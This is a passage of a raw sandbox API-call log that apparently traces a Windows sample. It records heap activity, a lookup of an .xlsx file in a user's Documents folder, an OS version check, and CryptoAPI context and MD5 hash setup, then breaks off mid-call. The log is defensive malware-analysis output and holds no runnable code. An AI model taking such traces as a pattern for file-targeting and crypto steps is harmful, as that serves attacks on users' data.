hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0220.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.000] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0220.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0220.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0220.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0220.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0220.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0220.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/oXBXXG.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aadc160, ftCreationTime.dwHighDateTime=0x1d574eb, ftLastAccessTime.dwLowDateTime=0xe2f72c30, ftLastAccessTime.dwHighDateTime=0x1d5a19b, ftLastWriteTime.dwLowDateTime=0xe2f72c30, ftLastWriteTime.dwHighDateTime=0x1d5a19b, nFileSizeHigh=0x0, nFileSizeLow=0xa07d, dwReserved0=0x0, dwReserved1=0x0, cFileName="oXBXXG.xlsx", cAlternateFileName="OXBXXG~1.XLS")) returned 0x9e1eb8 [0220.002] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0220.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0220.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0220.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.004] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.004] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0220.005] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.005] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.006] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0220.006] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.006] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.007] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0220.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0220.007] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.007] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0220.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0220.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0220.008] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bab0) returned 1 [0220.008] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0220.008] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0220.008] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.008] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.009] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0220.009] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0220.009] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.009] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.009] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.009] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.009] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.009] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.009] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.009] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.009] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.009] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabad0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0220.009] CryptCreateHash (in: hProv=0xa7bab0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0220.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ea8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.009] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0220.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, 